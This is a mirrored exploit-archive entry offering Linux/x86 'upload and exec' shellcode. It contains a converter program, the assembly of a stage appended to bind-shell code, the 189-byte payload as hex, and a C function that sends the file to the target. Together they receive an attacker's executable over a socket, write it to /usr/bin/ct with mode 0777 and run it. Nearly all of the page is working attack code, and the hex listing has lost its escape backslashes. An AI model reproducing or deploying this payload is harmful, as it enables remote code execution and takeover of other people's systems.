Linux/x86 – upload + exec Shellcode (189 bytes)

Linux/x86 – upload + exec Shellcode (189 bytes)

漏洞ID 1055171 漏洞类型
发布时间 2005-06-19 更新时间 2005-06-19
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13416
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
UPLOAD & EXEC SHELLCODE

[1] converting asm to hex
[2] asm code
[3] hex output
[4] upload function

This is an 'upload and exec' shellcode for the x86 platform.
The uploaded file has to be an executable built for the target:
cool if you know the target's distribution, otherwise
it is useless.

-cybertronic

[1]

/*
 * convert .s to shellcode typo/teso ([email protected])
 *
 * $ cat asm.s
 * .globl cbegin
 * .globl cend
 * cbegin:
 * "asm goes here"
 * cend:
 * $ gcc -Wall asm.s asm2hex.c -o out
 * $ ./out
 *
 */

#include

/* Labels marking the first and one-past-last byte of the assembled code;
 * they come from the .s file linked in alongside this program (see [2]).
 * main() only takes their addresses, it never calls them. */
extern void cbegin();
extern void cend();

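/*
 * Dumps the bytes between the cbegin and cend labels as a C array
 * initialiser ("\x..", 16 bytes per line) on stdout.
 *
 * The string literals on this page lost their backslashes in extraction
 * ("\x%02x" is not even a valid escape), so they are restored here:
 * the per-byte format is "\\x%02x", the line break closes one string
 * chunk and opens the next, and the dump ends with "\";\n".
 *
 * Returns 0.
 */
int
main (void)
{
    int i = 0;                              /* bytes already on the current output line */
    int x = 0;                              /* non-zero once the first byte has been printed */
    const unsigned char *buf = ( const unsigned char * ) cbegin;

    printf ( "unsigned char shellcode[] =\n\"" );
    /* The loop also stops at the first zero byte, not only at cend: a NUL
     * anywhere in [cbegin, cend) truncates the dump. */
    for ( ; ( *buf ) && ( buf < ( const unsigned char * ) cend ); buf++ )
    {
        if ( i++ == 16 )
            i = 1;
        if ( i == 1 && x != 0 )
            printf ( "\"\n\"" );            /* close this chunk, open the next line */
        x = 1;
        printf ( "\\x%02x", *buf );
    }
    printf ( "\";\n" );
    return ( 0 );
}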

[2]

# append to any bind shellcode
# gcc -Wall upload-exec.s asm2hex.c -o upload-exec
# cybertronic

# Stage that receives a file over an already-open connection, writes it to
# /usr/bin/ct with mode 0777, and execve()s it. Linux/i386 syscall numbers
# are used throughout (open=5, read=3, write=4, close=6, execve=11, exit=1).
.globl cbegin
.globl cend

cbegin:

	movl %eax,%ecx          # presumably %eax holds the connected socket fd left by the bind stage this is appended to - confirm against that stage

	jmp getstr              # jmp/call pair: the call at getstr pushes the address of the path string

start:

	popl %esi               # %esi = address of "/usr/bin/ct"

	leal (%esi),%ebx        # %ebx = path (first argument of open)
	xorl %eax,%eax
	movb %al,0x0b(%esi)     # store the NUL at offset 11 at run time: the converter in [1] stops at the first zero byte, so the terminator is not in the emitted bytes (this needs the shellcode's own memory to be writable)

	pushl %esi              # save the path pointer (popped back before execve)
	pushl %ecx              # save the socket fd (popped into %esi right after open)

	movb $0x05,%al          # open
	movw $0x241,%cx         # 0x241 = O_WRONLY|O_CREAT|O_TRUNC (0x1|0x40|0x200 on Linux/x86)
	movw $00777,%dx         # octal 0777: the created file is world-readable, -writable and -executable
	int  $0x80
	movl %eax,%edi          # %edi = fd of the created file
	popl %esi               # %esi = socket fd

read:

	movl %esi,%ebx          # read from the socket
	movb $0x03,%al          # read
	leal -200(%esp),%ecx    # one-byte buffer below the current stack pointer
	movb $0x01,%dl          # one byte per call
	int  $0x80

	cmpl $0xffffffff,%eax   # read returned -1: exit
	je end
	xorl %ecx,%ecx
	cmpl %eax,%ecx          # read returned 0 (peer closed the connection): transfer done
	je continue

	leal -200(%esp),%ecx    # same one-byte buffer
	xorl %ebx,%ebx
	movl %edi,%ebx          # write to the file fd
	movl %eax,%edx          # count = what read returned (1)
	movb $0x04,%al          # write
	int  $0x80

	jmp read                # loop until read returns 0 or -1

continue:

	movb $0x06,%al          # close(socket)
	movl %esi,%ebx
	int  $0x80
	movb $0x06,%al          # close(file)
	xorl %ebx,%ebx
	movl %edi,%ebx
	int  $0x80

	xorl %esi, %esi
	popl %esi               # %esi = path pointer saved before open
	movl %esi,0x0c(%esi)    # build argv in place just past the string: argv[0] = path (offset 12)
	xorl %eax,%eax
	movl %eax,0x10(%esi)    # argv[1] = NULL (offset 16); the same NULL doubles as the empty envp
	movb $0x0b,%al          # execve
	xchgl %esi,%ebx         # %ebx = path
	leal 0x0c(%ebx),%ecx    # %ecx = argv
	leal 0x10(%ebx),%edx    # %edx = envp
	int $0x80

end:

	xorl %eax,%eax
	incl %eax               # exit
	int $0x80

getstr:

	call start              # pushes the address of the string below
	.string "/usr/bin/ct"   # destination path on the target; its NUL is not emitted by [1], hence the movb above

cend:

[3]

/*
 * linux x86
 * 189 bytes upload & exec shellcode by cybertronic
 * cybertronic[at]gmx[dot]net
 *
 */

/* Byte string produced by the converter in [1], 16 escapes per line. As
 * reproduced on this page the backslash of every "\x" escape was lost in
 * extraction, so the text below is not a valid C literal as shown.
 * The rows before the "89 c1 eb 70" (movl %eax,%ecx; jmp getstr) that opens
 * listing [2] appear to be the bind-socket stage [2] says it is appended to
 * (repeated syscall 0x66, socketcall). The trailing bytes are the ASCII path
 * "/usr/bin/ct", which is the most stable string-match artifact in this blob. */
unsigned char shellcode[] =
"x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80"
"x89xc7x52x66x68xc7xc7x43x66x53x89xe1xb0xefxf6xd0"
"x50x51x57x89xe1xb0x66xcdx80xb0x66x43x43xcdx80x50"
"x50x57x89xe1x43xb0x66xcdx80x89xc1xebx70x5ex8dx1e"
"x31xc0x88x46x0bx56x51xb0x05x66xb9x41x02x66xbaxff"
"x01xcdx80x89xc7x5ex89xf3xb0x03x8dx8cx24x38xffxff"
"xffxb2x01xcdx80x83xf8xffx74x3ex31xc9x39xc1x74x13"
"x8dx8cx24x38xffxffxffx31xdbx89xfbx89xc2xb0x04xcd"
"x80xebxd3xb0x06x89xf3xcdx80xb0x06x31xdbx89xfbxcd"
"x80x31xf6x5ex89x76x0cx31xc0x89x46x10xb0x0bx87xf3"
"x8dx4bx0cx8dx53x10xcdx80x31xc0x40xcdx80xe8x8bxff"
"xffxffx2fx75x73x72x2fx62x69x6ex2fx63x74";

[4]

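/*
 * Sends the local file named "file" over a connection to ip, one byte at
 * a time.
 *
 * conn() is defined elsewhere in the original listing; it is taken to
 * return a connected socket descriptor, negative on failure
 * (NOTE(review): confirm its error convention).
 *
 * Returns 0 on success, 1 on any failure. Unlike the original, both
 * descriptors are closed on every path, and a read() that returns 0
 * before st_size bytes were sent (file shrank) is treated as a failure
 * instead of resending the previous byte.
 */
int
upload ( char* ip )
{
	int rc = 1;
	int s = -1;
	int fd = -1;
	off_t left;
	char ch;
	struct stat st;

	s = conn ( ip );
	if ( s < 0 )
		goto out;

	fd = open ( "file", O_RDONLY );
	if ( fd == -1 )
		goto out;
	if ( fstat ( fd, &st ) == -1 )
		goto out;

	for ( left = st.st_size; left > 0; left-- )
	{
		if ( read ( fd, &ch, 1 ) != 1 )
			goto out;
		if ( write ( s, &ch, 1 ) != 1 )
			goto out;
	}
	rc = 0;

out:
	if ( fd != -1 )
		close ( fd );
	if ( s >= 0 )
		close ( s );
	return ( rc );
}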

# milw0rm.com [2005-06-19]
